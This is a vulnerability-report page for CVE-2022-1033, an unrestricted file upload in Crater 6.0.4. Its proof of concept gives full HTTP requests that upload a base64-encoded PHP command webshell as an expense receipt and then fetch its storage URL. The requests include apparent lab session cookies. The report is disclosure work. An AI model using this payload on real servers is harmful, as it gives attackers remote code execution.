Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrTheworstcomrade4D7D4FC9-E0CF-42D3-B89C-6EA57A769045
HistoryFeb 20, 2022 - 9:02 p.m.

Unrestricted Upload of File with Dangerous Type

2022-02-2021:02:06
theworstcomrade
www.huntr.dev
20

0.0005 Low

EPSS

Percentile

18.0%

JSON

Description

In recent Crater version (bed05fc2 tag: 6.0.4) privileged user can upload PHP file as expense receipt.

Proof of Concept

POST /api/v1/expenses/59/upload/receipts HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
company: 1
X-XSRF-TOKEN: eyJpdiI6IkxRVSt6bm55Y0VyTkl6UUFaaWQ5cXc9PSIsInZhbHVlIjoiSkxPZi9tZHhiakxDeEYxR1ZmS0tXYmZrZnlqcHRVWnVQRUFQbzRpT1FBUzZzSUNYaU4vK0pLbG45Uk9SdHJBajR4bTVURzBvOHBpUjF4NmRWcFc0dlo0MUdsUHllVEZWaFRWU0lLZllWbkthbHJ5dTJLNEdkNG1mejlxZU9WUEYiLCJtYWMiOiIyODQ4NmY4MGQyZTg5NjhhM2EzM2JhNjA5ZDE4M2JjYjRhNDUyYjU2ZDZiNGZhMWI2ZmIzYTI1ZDQ0YjA2OWQ0IiwidGFnIjoiIn0=
Content-Type: multipart/form-data; boundary=---------------------------167024296112701364263127960184
Content-Length: 372
Origin: http://172.17.0.1:8888
DNT: 1
Connection: close
Referer: http://172.17.0.1:8888/admin/expenses/59/edit
Cookie: XSRF-TOKEN=eyJpdiI6IkxRVSt6bm55Y0VyTkl6UUFaaWQ5cXc9PSIsInZhbHVlIjoiSkxPZi9tZHhiakxDeEYxR1ZmS0tXYmZrZnlqcHRVWnVQRUFQbzRpT1FBUzZzSUNYaU4vK0pLbG45Uk9SdHJBajR4bTVURzBvOHBpUjF4NmRWcFc0dlo0MUdsUHllVEZWaFRWU0lLZllWbkthbHJ5dTJLNEdkNG1mejlxZU9WUEYiLCJtYWMiOiIyODQ4NmY4MGQyZTg5NjhhM2EzM2JhNjA5ZDE4M2JjYjRhNDUyYjU2ZDZiNGZhMWI2ZmIzYTI1ZDQ0YjA2OWQ0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InhkelVoY3p0RmpvQlgyemF4VlA2ZGc9PSIsInZhbHVlIjoiclZlNjNDdm9wSXo5cUg2cjNYOUQ1dVIwTFdrOUNnNE8yZzVvSmI4N0NPNHUzOHVrcGZoZDh1NjB1d0hrZi9OejA1VklUL0xjVEZ0K2wxMGlMODJJR0pOMmgxTEhjd2ttcy9hemg1YVJhM0daK0djaDAzSXNmaUpWMWpOYTJXWGMiLCJtYWMiOiIxY2I0NmExN2E1MDRiMzQyM2FiZWE2M2I4NTcxNzlmM2UxZjg3M2Q5Yjg3NjJhM2I5ZmMzMzY2YzU5MmU5MzE4IiwidGFnIjoiIn0%3D; 2CFqtnwTnUo9tjJ5scD3gy0OQlXUasdaVYthIQKu=eyJpdiI6IkZRY3BodmN6ZDJhQzJ6RFhqZVg0amc9PSIsInZhbHVlIjoibjBoUGkzNEE2YVJmdGphUHYzQnFZcHNKdnBHeU9mQk1PL1kzNTNqYWpUVm05VDRlbTdGekROOGxwd2U2VDdpNEdsMGpXQ0I1ZU92bGJJMnluUEJSOWh2S3Y1QWJRTi9zQnRGN0VZTGNvK2ZnU1hWMlBBWitmM2tSa3hrbEdFRVo3dFdhZmdzaHNQZFp3TlE2dFBHSXluSkRqQzVtRUlJYWo4T2JHTEtQTkpUYkFZT1pWOEdUTm1TR0E1SXdld01XblJlTFNNKy83SWlSaHpkbUYrMGREYzVTTmsxZERlRm1IMGRWbFBJSzdUT3VqT0kxN2JwMUZnOHMwMUw1dUNDMHhPNE5Sb2tPdCt5NzVHdlArSDlnOGc4dTJ1MG9KUnZPNUdjanF5Y1ljZkJsY1F5N2h6bTlBcGRMSjZBRjZNaVduMXcwendtaXh5cVBycjJJcEhLRG1xbzM3R1cwWjRQc29Tc3g3aHBiS29iVExYTWc3bWtiR0RVbE9yZ0dlTnRub243WUxudmV3ZSswaHhINVBxdzdvWWx0SlhrMndZY1RMTWRXUWZnVEEyWnRsRWFQcVVSVEZTYzNHYXRGaGs5eFovK1ErUVdKQjIyRkY2MGZZNlI0cXhnakhTSXFUWWRrYlU5RWREYk9LMlZ1RzZpYWFCd214bW5zcFVTUVczVTFmR3p2eFQyaGpGR3hsYVNnQkdENnZRPT0iLCJtYWMiOiIyZTA2YTZjZDk3Mjg5ZWM1MjU3ODk4MzIxY2NiOWUwODRhYTAwNDllOThiMTNlOWVkZGIxZTgwYmMyOGFjZTk1IiwidGFnIjoiIn0%3D

-----------------------------167024296112701364263127960184
Content-Disposition: form-data; name="type"

edit
-----------------------------167024296112701364263127960184
Content-Disposition: form-data; name="attachment_receipt"

{"data":"PD89YCRfR0VUWzFdYD8+","type":"edit","name":"2137webshell.php"}
-----------------------------167024296112701364263127960184--

Next when get this expense through the API You will receive attachment_receipt_url param with url to the webshell file

GET /api/v1/expenses/59 HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
company: 1
X-XSRF-TOKEN: eyJpdiI6IkR4UDNSU1kzai9Ya0ljSTg1cEpCWmc9PSIsInZhbHVlIjoiMVA1b241VHpQWlBQNklrT1RVM1RxcUZRSEU3MGkraHh1OTNQcnJzdWVGR25mblZRQWp6Y3hhYzJnamkyWDgzNEpING9hb3lzT1U4dWlKYlFrcm0zYWlKNWNOQlRhWHVnQnpuTm1TZVVSdHIweTNHMFJJN0F4Z3FwNlhYZEVaY1oiLCJtYWMiOiI3YTQyMDk1NGNmYTYxMGMyZWM0MzQzNDkwMWQ0NDc1NzdiNjdiNmRhNzgzNTA4ZjU5NDVhYTAyNWU1YzZiNDYzIiwidGFnIjoiIn0=
DNT: 1
Connection: close
Referer: http://172.17.0.1:8888/admin/expenses/59/edit
Cookie: ...


HTTP/1.1 200 OK
Host: 172.17.0.1:8888
Date: Sun, 20 Feb 2022 20:47:20 GMT
Connection: close
X-Powered-By: PHP/8.0.15
Cache-Control: no-cache, private
Date: Sun, 20 Feb 2022 20:47:20 GMT
Content-Type: application/json
X-RateLimit-Limit: 180
X-RateLimit-Remaining: 178
Set-Cookie: ...

{
    "data":
    {
        "id": 59,
        "expense_date": "2022-01-22T00:00:00.000000Z",
        "amount": 100,
        "notes": "assss",
        "customer_id": 2,
        "attachment_receipt_url":
        {
            "url": "http:\/\/172.17.0.1:8888\/storage\/50\/2137webshell.php",
            "type": "other"
        }
...
    }
}

Impact

This vulnerability is high and leads to code execution

Related

cvelist 1
cve 1
osv 1
nvd 1
prion 1
cvelist
cvelist
CVE-2022-1033 Unrestricted Upload of File with Dangerous Type in crater-invoice/crater
2022-03-23 07:45:13
cve
cve
CVE-2022-1033
2022-03-23 08:15:08
osv
osv
CVE-2022-1033
2022-03-23 08:15:08
nvd
nvd
CVE-2022-1033
2022-03-23 08:15:08
prion
prion
Unrestricted file upload
2022-03-23 08:15:00

0.0005 Low

EPSS

Percentile

18.0%

JSON
Related for 4D7D4FC9-E0CF-42D3-B89C-6EA57A769045
cvelist1cve1osv1nvd1prion1